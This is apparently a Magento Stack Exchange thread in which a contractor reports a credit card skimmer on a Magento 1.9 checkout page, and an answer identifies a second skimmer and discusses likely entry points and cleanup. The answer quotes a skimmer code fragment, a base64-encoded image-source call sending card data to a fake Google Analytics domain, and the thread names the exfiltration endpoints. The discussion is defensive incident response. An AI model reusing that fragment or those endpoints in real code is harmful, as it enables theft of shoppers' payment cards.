# Help! Credit Card Grabber Found on Magento 1.9

Tags: magento-1.9, security

I've found a piece of code that contacts a really weird domain with CC info.

Can someone confirm it doing something malicious?

If so, what should I do without taking down the server? I'm a total noob with 1.9.

I have root access to the old server.

- its running Ubuntu 14.04.5 LTS
- apache 2
- magento 1.9
- cache is disabled on it.
- serious perfomance issues
- running multiple sites
- I can't afford to take it down

URL location of JS injection: base_url/checkout/cart

Contacts this domain with ajax query: jqueryexts.us/gate.php

[image]

Story:
I've been contracted to work on their MG2 upgrade, which hopefully will be done in 2 weeks.. was looking at the live site checkout js and found this shocker.

Answer (score 3, accepted):

You have not one but at least two (competing) card skimmers. The `jqueryexts.us` is a simple one, but in your screenshot cards are also exfiltrated via:

```
n.src=atob("aHR0cHM6Ly9nb29nbGUtYW5hbHlpdGljcy5vcmcvZ2EvZ2EucGhw"
```

Which is `https://google-analyitics.org/ga/ga.php`. See also my blog about [fake Google Analytics skimmers](https://gwillem.gitlab.io/2018/09/06/fake-google-analytics-malware/).

If your domain starts with "green", your site appeared first compromised on Nov 18th. Based on your URLs, they could have abused a SQL injection vulnerability in the GeoIP_Redirect module. Or a number of other vulnerable modules, see https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/

You should find out how they got in, or disable credit card payments until you migrate to M2.

Comment: Thanks Willem, for both confirming jQ and running base64 decode on that image of a string!
That domain, green, is one i'm familiar with, but isn't the only one.. Would you use your magento-malware-scanner on a multi site install? Currently I've nuked one skimmer found in the core_config SQL table design/footer/absolute_footer.

can you disclose where the SQL inj vulnerability is? I can contact you via email. Thanks again.

Comment: If you're using Amasty, upgrade to the latest version -> https://amasty.com/magento-geoip-redirect.html
Otherwise, send me a mail gwillem@gmail.com

Comment: Hey Willem, we're not using Amasty we using a custom module that fires on <events><"controller_action_layout_generate_blocks_before"></events> then Mage::helper('core/http')->getRemoteAddr() eventually onto Mage::app()->getFrontController()->getResponse()
                            ->setRedirect(Mage::getUrl('geoip_redirect/askredirect/index', array('redirect_url' => urlencode(urlencode($u)), 'mid'=>"$i")))
                            ->sendResponse();  I don't see anything here that does sql injection.. I've sent you an email saying hello =) Thanks